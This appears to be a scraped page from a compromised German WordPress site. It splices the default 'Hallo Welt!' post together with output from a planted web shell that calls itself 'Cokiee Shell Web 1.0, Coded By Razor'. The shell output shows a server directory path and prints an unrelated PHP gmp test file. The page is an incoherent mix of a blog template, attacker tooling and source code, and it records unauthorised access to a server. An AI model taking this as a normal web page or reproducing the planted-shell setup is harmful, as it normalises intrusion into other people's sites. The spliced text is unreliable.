Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/gmp/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/gmp/tests/bug50175.phpt |
--TEST-- Bug #50175: gmp_init() results 0 on given base and number starting with 0x or 0b --FILE-- <?php var_dump(gmp_init('0bcd', 16)); var_dump(gmp_init('0xyz', 36)); ?> --EXPECTF-- object(GMP)#%d (1) { ["num"]=> string(4) "3021" } object(GMP)#%d (1) { ["num"]=> string(5) "44027" }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare